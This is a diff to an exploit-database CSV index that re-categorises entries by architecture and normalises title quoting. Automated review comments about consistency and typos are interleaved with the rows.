36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
|
||||
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
|
||||
|
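Review bot: The rewritten row for 36741 still carries the typo "Denial of Serviec" in its description. The row is already being changed to move it to lin_x86, so correct it to "Denial of Service" in the same edit; as it stands, a title search for "Denial of Service" will keep missing this entry.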
@ -4642,7 +4642,7 @@ id,file,description,date,author,platform,type,port
|
|||
37865,platforms/multiple/dos/37865.txt,"Adobe Flash - attachMovie Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
|
||||
37866,platforms/linux/dos/37866.txt,"Adobe Flash - Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37867,platforms/linux/dos/37867.txt,"Adobe Flash - Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37868,platforms/linux/dos/37868.txt,"Adobe Flash - Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37868,platforms/lin_x86-64/dos/37868.txt,"Adobe Flash (Linux x64) - Bad Dereference at 0x23c",2015-08-19,"Google Security Research",lin_x86-64,dos,0
|
||||
37869,platforms/linux/dos/37869.txt,"Adobe Flash - Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37870,platforms/linux/dos/37870.txt,"Adobe Flash - Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0
|
||||
37871,platforms/multiple/dos/37871.txt,"Adobe Flash - swapDepths Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
|
||||
|
@ -5081,7 +5081,7 @@ id,file,description,date,author,platform,type,port
|
|||
39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0
|
||||
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
|
||||
39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
|
||||
39669,platforms/linux/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
|
||||
39669,platforms/lin_x86/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",lin_x86,dos,0
|
||||
39685,platforms/android/dos/39685.txt,"Google Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
|
||||
39686,platforms/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
|
||||
39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0
|
||||
|
@ -5110,7 +5110,7 @@ id,file,description,date,author,platform,type,port
|
|||
39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0
|
||||
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash (PoC)",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
|
||||
39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field Overwrite (SEH) (PoC)",2016-05-10,"Zahid Adeel",windows,dos,0
|
||||
39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21
|
||||
39797,platforms/win_x86/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",win_x86,dos,21
|
||||
39799,platforms/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos,0
|
||||
39800,platforms/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos,0
|
||||
39801,platforms/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0
|
||||
|
@ -5300,7 +5300,7 @@ id,file,description,date,author,platform,type,port
|
|||
40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::EnsureDeleteCFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
|
||||
40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::ExecuteScriptUri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
|
||||
40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBaseScriptable::PrivateQueryInterface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
|
||||
40883,platforms/windows/dos/40883.py,"Windows 10 x86/x64 WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
|
||||
40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
|
||||
40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
|
||||
40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
|
||||
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
|
||||
|
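Review bot: The new description for 40883 only adds parentheses around "x86/x64" and leaves two other inconsistencies in place: it ends in "(POC)" where other rows in this file use "(PoC)", and it starts with "Windows 10" while the neighbouring Microsoft entries carry the vendor name ("Microsoft Edge", "Microsoft Internet Explorer 9"). Normalising both in this edit would make the row match vendor-prefixed searches.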
@ -5396,7 +5396,7 @@ id,file,description,date,author,platform,type,port
|
|||
200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
|
||||
202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
|
||||
203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
|
||||
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
|
||||
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - 'SUID' Privilege Escalation",2000-11-29,Tlabs,linux,local,0
|
||||
206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
|
||||
207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
|
||||
209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
|
||||
|
@ -5520,7 +5520,7 @@ id,file,description,date,author,platform,type,port
|
|||
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
|
||||
788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0
|
||||
791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
792,platforms/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
|
||||
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
|
||||
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
|
||||
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
|
||||
|
@ -5607,8 +5607,8 @@ id,file,description,date,author,platform,type,port
|
|||
1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client-Side Buffer Overflow",2005-08-30,vade79,linux,local,0
|
||||
1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0
|
||||
1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
|
||||
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0
|
||||
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation",2005-09-24,kingcope,linux,local,0
|
||||
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0
|
||||
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation",2005-09-24,kingcope,linux,local,0
|
||||
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0
|
||||
1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
|
||||
1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0
|
||||
|
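Review bot: the new title for 1215 drops the "(some setuid)" qualifier outright, whereas 1229 in the same hunk keeps its component and only re-quotes it as 'poppassd'. That qualifier was the only place the row recorded a setuid precondition. If the parenthetical is being removed for style, carry the condition over in another form so the description still says when the issue applies.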
@ -5654,7 +5654,7 @@ id,file,description,date,author,platform,type,port
|
|||
1719,platforms/multiple/local/1719.txt,"Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0
|
||||
1772,platforms/windows/local/1772.c,"Intel Wireless Service - 's24evmon.exe' Shared Memory Exploit",2006-05-09,"Ruben Santamarta",windows,local,0
|
||||
1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0
|
||||
40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
|
||||
40336,platforms/win_x86-64/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
|
||||
1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0
|
||||
1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
|
||||
1911,platforms/windows/local/1911.c,"Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
|
||||
|
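Review bot: row 40336 changes the file column from platforms/windows/local/40336.py to platforms/win_x86-64/local/40336.py along with the platform column, but this hunk only touches the index. Confirm the same commit moves the file itself, otherwise the file column points at a path that is not there. The row also sits between ids 1806 and 1831; if the index is meant to be ordered by id, this edit is a good moment to move it.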
@ -5675,8 +5675,8 @@ id,file,description,date,author,platform,type,port
|
|||
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (3)",2006-07-13,"Marco Ivaldi",linux,local,0
|
||||
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (4)",2006-07-14,Sunay,linux,local,0
|
||||
2013,platforms/linux/local/2013.c,"Linux Kernel 2.6.17.4 - 'proc' Privilege Escalation",2006-07-15,h00lyshit,linux,local,0
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - (umount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - (mount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - 'umount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - 'mount-loop' Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0
|
||||
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
|
||||
2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0
|
||||
2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0
|
||||
|
@ -5721,7 +5721,7 @@ id,file,description,date,author,platform,type,port
|
|||
2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - (symlink) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
|
||||
2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - (unsafe system call) Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0
|
||||
2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0
|
||||
40380,platforms/windows/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",windows,local,0
|
||||
40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0
|
||||
2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0
|
||||
2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0
|
||||
2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0
|
||||
|
@ -5855,7 +5855,7 @@ id,file,description,date,author,platform,type,port
|
|||
4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
|
||||
4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
|
||||
4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
|
||||
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
|
||||
4460,platforms/lin_x86-64/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",lin_x86-64,local,0
|
||||
4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
|
||||
4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
|
||||
4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
|
||||
|
@ -5925,7 +5925,7 @@ id,file,description,date,author,platform,type,port
|
|||
6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0
|
||||
6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0
|
||||
6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,windows,local,0
|
||||
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - (symlink) Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
|
||||
6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
|
||||
6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0
|
||||
6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
|
||||
6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
|
||||
|
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
|
|||
7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0
|
||||
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
|
||||
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0
|
||||
7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
|
||||
7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
|
||||
40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
|
||||
7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0
|
||||
7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
|
||||
|
@ -6127,7 +6127,7 @@ id,file,description,date,author,platform,type,port
|
|||
9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
|
||||
9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
|
||||
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
|
||||
9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
|
||||
9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,lin_x86-64,local,0
|
||||
9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0
|
||||
9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0
|
||||
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
|
||||
|
@ -6202,7 +6202,7 @@ id,file,description,date,author,platform,type,port
|
|||
9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local,0
|
||||
9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local,0
|
||||
9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0
|
||||
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",linux,local,0
|
||||
9542,platforms/lin_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",lin_x86,local,0
|
||||
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0
|
||||
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0
|
||||
9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,windows,local,0
|
||||
|
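Review bot: 9542 moves to lin_x86 because its title says x86, while 9545 two rows below carries "(PPC)" in its title and stays under plain linux. If architecture-specific platform values are being introduced, state what happens to architectures that have no dedicated value, so the split is a documented rule rather than a per-row choice. Anything that selects rows by platform linux will also stop returning 9542 after this change, which is worth calling out in the commit message.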
@ -6582,8 +6582,8 @@ id,file,description,date,author,platform,type,port
|
|||
14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
|
||||
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
|
||||
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
|
||||
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
|
||||
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
|
||||
15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0
|
||||
15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0
|
||||
15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
|
||||
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
|
||||
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
|
||||
|
@ -6608,7 +6608,7 @@ id,file,description,date,author,platform,type,port
|
|||
15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
|
||||
15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
|
||||
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load (Privilege Escalation)",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - (Dynamic Linker LD_AUDIT Arbitrary DSO Load) Privilege Escalation",2010-10-22,"Tavis Ormandy",linux,local,0
|
||||
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
|
||||
15344,platforms/linux/local/15344.c,"Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite",2010-10-28,"Kees Cook",linux,local,0
|
||||
15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit",2010-11-01,"Nikita Tarakanov",windows,local,0
|
||||
|
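Review bot: the new title for 15304 wraps the whole phrase "(Dynamic Linker LD_AUDIT Arbitrary DSO Load)" in parentheses, while the neighbouring row 15274 in this hunk quotes just the identifier as '$ORIGIN'. Quoting only the identifier, for example "Dynamic Linker 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation", would match that convention and keep the description readable.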
@ -6658,7 +6658,7 @@ id,file,description,date,author,platform,type,port
|
|||
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
|
||||
15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow",2011-01-01,anonymous,windows,local,0
|
||||
15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
|
||||
15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",linux,local,0
|
||||
15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0
|
||||
15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0
|
||||
15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0
|
||||
15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0
|
||||
|
@ -6723,7 +6723,7 @@ id,file,description,date,author,platform,type,port
|
|||
16631,platforms/windows/local/16631.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
|
||||
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
|
||||
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16634,platforms/windows/local/16634.rb,"Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
|
||||
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
|
||||
16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
|
||||
|
@ -6760,7 +6760,7 @@ id,file,description,date,author,platform,type,port
|
|||
16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
|
||||
16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0
|
||||
